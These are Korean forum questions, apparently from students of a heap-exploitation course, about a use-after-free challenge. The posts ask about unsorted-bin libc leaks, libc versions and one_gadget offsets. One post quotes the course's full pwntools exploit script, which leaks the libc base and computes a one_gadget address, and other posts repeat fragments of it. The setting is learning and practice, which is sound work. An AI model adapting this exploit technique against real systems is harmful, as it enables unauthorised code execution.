만약 이러한 유형의 문제에서 해당하는 libc의 one gadget이 다 안 먹힌다면 어떠한 방식으로 익스플로잇이 가능할까요?

unsorted bin에서 설정되는 FD값의 main_arena_xx 값과 one_gadget offset을 구하기위해 libc 버전이 필요한거 같은데, 강의대로 진행하며 libc버전을 구할 수 있는 방법이 궁금합니다.

해당 문제 강의에서 custom_func 함수는 0x100 바이트 이상의 크기를 갖는 청크를 할당하고, 할당된 청크들 중 원하는 청크를 해제할 수 있는 함수이고 0x410 이하의 크기를 갖는 청크는 tcache에 먼저 삽입되므로, 이보다 큰 청크를 해제해서 unsorted bin에 연결하고, 이를 재할당하여 값을 읽으면 libc가 매핑된 주소를 계산할 수 있다 하였습니다. 그리고 unsorted bin에 포함되는 청크와 탑 청크는 병합 대상이므로, 이 둘이 맞닿으면 청크가 병합되어 이를 피하려면 청크 두 개를 연속으로 할당하고, 처음 할당한 청크를 해제해야 한다고 했습니다. custom(0x500, "AAAA", -1) custom(0x500, "AAAA", -1) custom(0x500, "AAAA", 0) custom(0x500, "B", -1) 그런데 탑 청크와 인접하지 않기 위함이면 아래와 같이 해도 괜찮지 않을까 생각했습니다. custom(0x500, "AAAA", -1) custom(0x500, "AAAA", 0) custom(0x500, "B", -1) 실제로 수정하여 했을 때 정상작동 하였는데 혹시 강의 코드와 같이 작성하는 이유가 따로 있을까요?

강의에서 커스텀 함수로 libc 주소를 구하는데 커스텀 함수중 한곳만 idx(0)를 놓는이유는 무엇인가요? def custom(size, data, idx): p.sendlineafter(">", "3") p.sendlineafter(": ", str(size)) p.sendafter(": ", data) p.sendlineafter(": ", str(idx)) UAF to calculate the libc_base custom(0x500, "AAAA", -1) custom(0x500, "AAAA", -1) custom(0x500, "AAAA", 0) custom(0x500, "B", -1)

바로 앞 강의에서의 코드에서 process 부분을 remote라고만 변경하면 문제가 풀리기는 하는데... 직전 강의에서 바이너리 파일을 이용했을 때는 og = lb + 0x10a41c 부분에 0x10a41c 대신 제가 직접 구한 one_gadget을 넣어줘야 했습니다. 그런데 여기서는 직접 구한 one_gadget을 넣어주면 안 되네요. 그렇다면 0x10a41c는 어디서 나온 값인지 알 수 있을까요?

Offset 값을 찾아 보려고 해도, __malloc_free 로도 맞지 않는데, 어떻게 구했는지 알수 있을까요?

아래는 강의에서 나온 코드인데요.. fd나 bk에 있는 주소를 받는 부분 앞에서 free idx까지 입력을 해서 데이터가 나올 곳이 없는데 도대체 어떻게 주소를 받는 것인가요? 그리고 제가 data까지 입력을 한 뒤 데이터가 나올 때 그 데이터를 받도록 추가적으로 코드를 설계 했는데 엉뚱한 값을 받는 것 같아요.. 도와주세요 from pwn import * p = process("./uaf_overwrite") def slog(sym, val): success(sym + ": " + hex(val)) def human(weight, age): p.sendlineafter(">", "1") p.sendlineafter(": ", str(weight)) p.sendlineafter(": ", str(age)) def robot(weight): p.sendlineafter(">", "2") p.sendlineafter(": ", str(weight)) def custom(size, data, idx): p.sendlineafter(">", "3") p.sendlineafter(": ", str(size)) p.sendafter(": ", data) p.sendlineafter(": ", str(idx)) UAF to calculate the libc_base custom(0x500, "AAAA", -1) custom(0x500, "AAAA", -1) custom(0x500, "AAAA", 0) custom(0x500, "B", -1) # data 값이 "B"가 아니라 "C"가 된다면, offset은 0x3ebc42 가 아니라 0x3ebc43이 됩니다. lb = u64(p.recvline()[:-1].ljust(8, b"\x00")) - 0x3ebc42 og = lb + 0x10a41c slog("libc_base", lb) slog("one_gadget", og) `

image.png 이렇게 무한루프 내에서 따인걸로 떠서 명령어 치면 무한루프 재생되는데 어떻게 해야되나여..

0x555555603260: 0x00007ffff7dc0a42 0x00007ffff7dcdca0 위는 Chunk에 데이터 B를 입력한 후 heap을 통해 확인한 값입니다. 왜 fd값이 0x00007ffff7dcdc42가 아닌 0x00007ffff7dc0a42으로 나오나요??

정말 여러가지 다 해보고 코드도 writeup 보고 따라해서 써보고 복붙도 해봤는데 전부 안되네요.. ptmalloc2가 구현된 GLIBC 버전에 따라서 기법이 많이 달라지는걸로 알고 있거든요.. 혹시 버전이 업데이트 돼서 안되는건가요? 아니면 제가 그냥 못 푸는건가요?..